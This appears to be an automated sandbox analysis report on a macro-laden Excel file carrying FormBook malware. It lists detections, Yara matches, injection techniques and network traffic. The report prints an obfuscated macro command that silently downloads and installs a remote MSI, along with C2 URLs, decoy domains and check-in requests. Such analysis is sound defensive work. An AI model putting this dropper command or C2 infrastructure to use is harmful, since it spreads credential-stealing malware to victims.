Analysis Report 0d69e4f6_by_Libranalysis

Overview

General Information

Sample Name: 0d69e4f6_by_Libranalysis (renamed file extension from none to xls)
Analysis ID: 402839
MD5: 0d69e4f684735cf4f187659ee0882fd8
SHA1: 55a52f6971084224e3030b76cd44d13b0203b749
SHA256: 0c856e57da034a8943b4065297d075365090d9eb925abb7ba74dd3df9acefc1f
Tags: Formbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
DLL side loading technique detected
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: www.111bjs.com/ccr/ Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.111bjs.com/ccr/"], "decoy": ["abdullahlodhi.com", "jevya.com", "knoxvillerestaurant.com", "mekarauroko7389.com", "cricketspowder.net", "johannchirinos.com", "orangeorganical.com", "libero-tt.com", "lorenaegianluca.com", "wintab.net", "modernmillievintage.com", "zgdqcyw.com", "jeffabildgaardmd.com", "nurulfikrimakassar.com", "findyourchef.com", "innovationsservicegroup.com", "destek-taleplerimiz.com", "whfqqco.icu", "kosmetikmadeingermany.com", "dieteticos.net", "savarsineklik.com", "newfashiontrends.com", "e-mobilitysolutions.com", "spaced.ltd", "amjadalitrading.com", "thejstutor.com", "zzhqp.com", "exoticomistico.com", "oklahomasundayschool.com", "grwfrog.com", "elementsfitnessamdwellbeing.com", "auldontoyworld.com", "cumhuriyetcidemokratparti.kim", "thetruthinternational.com", "adimadimingilizce.com", "retreatwinds.com", "duoteshop.com", "jasonkokrak.com", "latindancextreme.com", "agavedeals.com", "motz.xyz", "kspecialaroma.com", "yuejinjc.com", "print12580.com", "ampsports.tennis", "affordablebathroomsarizona.com", "casnop.com", "driftwestcoastmarket.com", "bjsjygg.com", "gwpjamshedpur.com", "reserveacalifornia.com", "caobv.com", "culturaenmistacones.com", "back-upstore.com", "jjsmiths.com", "iamxc.com", "siobhankrittiya.com", "digitalakanksha.com", "koatku.com", "shamushalkowich.com", "merplerps.com", "fishexpertise.com", "sweetheartmart.com", "nqs.xyz"]}
Multi AV Scanner detection for submitted file
Source: 0d69e4f6_by_Libranalysis.xls ReversingLabs: Detection: 38%
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: 0d69e4f6_by_Libranalysis.xls Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.MSID8B1.tmp.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.MSID8B1.tmp.710000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.1.MSID8B1.tmp.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wininit.pdb source: MSID8B1.tmp, 00000007.00000003.2147755225.0000000000520000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: MSID8B1.tmp, wininit.exe

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\wininit.exe Code function: 4x nop then pop edi 9_2_00097D24
Source: C:\Windows\SysWOW64\wininit.exe Code function: 4x nop then pop edi 9_2_00097D7A
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: cdn.discordapp.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 192.0.78.25:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 192.0.78.25:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 192.0.78.25:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 192.0.78.25:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 192.0.78.25:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.111bjs.com/ccr/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ccr/?y4O4=T9ggCBMXA5kAUDbc6O9tV0ryY3konbkqBjEqxZCv5OYSRYyBdrwjx1uFIWjpE/1JsOmiOw==&pHE=kv2pMLCxOn HTTP/1.1Host: www.adimadimingilizce.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ccr/?y4O4=cWavVGQKmIqDppXzWyVy8r7Kst7Id+XyOUJHTBkcFhMzlMGfnIsimvg2OkFJfjv7X60kTQ==&pHE=kv2pMLCxOn HTTP/1.1Host: www.destek-taleplerimiz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 192.0.78.25 192.0.78.25
Source: Joe Sandbox View IP Address: 99.83.154.118 99.83.154.118
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AUTOMATTICUS AUTOMATTICUS
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: global traffic HTTP traffic detected: GET /ccr/?y4O4=T9ggCBMXA5kAUDbc6O9tV0ryY3konbkqBjEqxZCv5OYSRYyBdrwjx1uFIWjpE/1JsOmiOw==&pHE=kv2pMLCxOn HTTP/1.1Host: www.adimadimingilizce.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ccr/?y4O4=cWavVGQKmIqDppXzWyVy8r7Kst7Id+XyOUJHTBkcFhMzlMGfnIsimvg2OkFJfjv7X60kTQ==&pHE=kv2pMLCxOn HTTP/1.1Host: www.destek-taleplerimiz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: MSID8B1.tmp, 00000006.00000002.2096383823.00000000020A0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2344296139.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000008.00000000.2107572712.0000000004F30000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: MSID8B1.tmp, 00000006.00000002.2096383823.00000000020A0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2344296139.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000008.00000000.2112003185.000000000856E000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.2112003185.000000000856E000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: msiexec.exe, 00000004.00000002.2097975295.0000000000330000.00000004.00000020.sdmp, msiexec.exe, 00000004.00000002.2098042878.00000000003BA000.00000004.00000020.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi
Source: msiexec.exe, 00000004.00000002.2098087183.0000000000566000.00000004.00000001.sdmp, msiexec.exe, 00000004.00000002.2098074405.0000000000466000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi/qn
Source: msiexec.exe, 00000004.00000002.2097965804.0000000000324000.00000004.00000040.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi/qnG

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Document contains an embedded VBA macro which may execute processes
Source: 0d69e4f6_by_Libranalysis.xls OLE, VBA macro line: vku22t7AsavSAtE_rIC_Ltzl_ac4OZD6Y8kFqCHZ4Ws6KEqj_aJDvoCDtI1bOBuRVz4CH8Tn_mIy_3Y3_2IxN = ywPoSobDlP42oHWDPKpiAOl6vutg4GnFgWlXDXop_JC4yy5LjDxxLctjLTzh55HdnvUQh8_2g9wzLrE7yf7zRw3DnAKtg.Run(khIimJ_GTwcaRVcTR2Q2itkUKSGNZlvtyyEUgyO_qkFaFk28ao4eaCr16x, a_JK2JrDQTw6_KnVD_Z_K5m6VNcmCppFaTS_ReJjuMTATYVxRbVmh__ebMyor__mpqfa1mCi3z88llm61oSlRBjajxi_pf1qLrUo3)
Source: VBA code instrumentation OLE, VBA macro: Module AK2_oiMjTt8L, Function WSBfss_tkcPGwcnKL7lINlZHv_rRRvHNXrb6BI1XaW9ZsSza1NytP, API IWshShell3.Run("CMd /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn ",0:Integer) Name: WSBfss_tkcPGwcnKL7lINlZHv_rRRvHNXrb6BI1XaW9ZsSza1NytP
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\Installer\MSID8B1.tmp Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\Installer\MSID8B1.tmp Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\Installer\MSID8B1.tmp Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\Installer\MSID8B1.tmp Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F00C4 NtCreateFile,LdrInitializeThunk, 7_2_008F00C4
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F0048 NtProtectVirtualMemory,LdrInitializeThunk, 7_2_008F0048
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F0078 NtResumeThread,LdrInitializeThunk, 7_2_008F0078
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EF9F0 NtClose,LdrInitializeThunk, 7_2_008EF9F0
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EF900 NtReadFile,LdrInitializeThunk, 7_2_008EF900
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_008EFAD0
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_008EFAE8
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_008EFBB8
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_008EFB68
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFC90 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_008EFC90
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_008EFC60
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFD8C NtDelayExecution,LdrInitializeThunk, 7_2_008EFD8C
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_008EFDC0
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFEA0 NtReadVirtualMemory,LdrInitializeThunk, 7_2_008EFEA0
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_008EFED0
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFFB4 NtCreateSection,LdrInitializeThunk, 7_2_008EFFB4
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F10D0 NtOpenProcessToken, 7_2_008F10D0
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F0060 NtQuerySection, 7_2_008F0060
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F01D4 NtSetValueKey, 7_2_008F01D4
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F010C NtOpenDirectoryObject, 7_2_008F010C
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F1148 NtOpenThread, 7_2_008F1148
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F07AC NtCreateMutant, 7_2_008F07AC
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EF8CC NtWaitForSingleObject, 7_2_008EF8CC
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EF938 NtWriteFile, 7_2_008EF938
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F1930 NtSetContextThread, 7_2_008F1930
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFAB8 NtQueryValueKey, 7_2_008EFAB8
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFA20 NtQueryInformationFile, 7_2_008EFA20
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFA50 NtEnumerateValueKey, 7_2_008EFA50
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFBE8 NtQueryVirtualMemory, 7_2_008EFBE8
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFB50 NtCreateKey, 7_2_008EFB50
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFC30 NtOpenProcess, 7_2_008EFC30
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFC48 NtSetInformationFile, 7_2_008EFC48
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F0C40 NtGetContextThread, 7_2_008F0C40
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008F1D80 NtSuspendThread, 7_2_008F1D80
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFD5C NtEnumerateKey, 7_2_008EFD5C
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFE24 NtWriteVirtualMemory, 7_2_008EFE24
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFFFC NtCreateProcessEx, 7_2_008EFFFC
Source: C:\Windows\Installer\MSID8B1.tmp Code function: 7_2_008EFF34 NtQueueApcThread, 7_2_008EFF34
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021F00C4 NtCreateFile,LdrInitializeThunk, 9_2_021F00C4
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021F07AC NtCreateMutant,LdrInitializeThunk, 9_2_021F07AC
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFAB8 NtQueryValueKey,LdrInitializeThunk, 9_2_021EFAB8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_021EFAD0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFAE8 NtQueryInformationProcess,LdrInitializeThunk, 9_2_021EFAE8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFB50 NtCreateKey,LdrInitializeThunk, 9_2_021EFB50
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFB68 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_021EFB68
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFBB8 NtQueryInformationToken,LdrInitializeThunk, 9_2_021EFBB8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EF900 NtReadFile,LdrInitializeThunk, 9_2_021EF900
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EF9F0 NtClose,LdrInitializeThunk, 9_2_021EF9F0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_021EFED0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFFB4 NtCreateSection,LdrInitializeThunk, 9_2_021EFFB4
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFC60 NtMapViewOfSection,LdrInitializeThunk, 9_2_021EFC60
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFD8C NtDelayExecution,LdrInitializeThunk, 9_2_021EFD8C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFDC0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_021EFDC0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021F0048 NtProtectVirtualMemory, 9_2_021F0048
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021F0078 NtResumeThread, 9_2_021F0078
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021F0060 NtQuerySection, 9_2_021F0060
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021F10D0 NtOpenProcessToken, 9_2_021F10D0
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021F010C NtOpenDirectoryObject, 9_2_021F010C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021F1148 NtOpenThread, 9_2_021F1148
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021F01D4 NtSetValueKey, 9_2_021F01D4
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFA20 NtQueryInformationFile, 9_2_021EFA20
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFA50 NtEnumerateValueKey, 9_2_021EFA50
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EFBE8 NtQueryVirtualMemory, 9_2_021EFBE8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EF8CC NtWaitForSingleObject, 9_2_021EF8CC
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021EF938 NtWriteFile, 9_2_021EF938
Source: C:\Windows\SysWOW64\wininit.exe Code function: 9_2_021F1930 NtSetContextThread, 9_2_021F1930
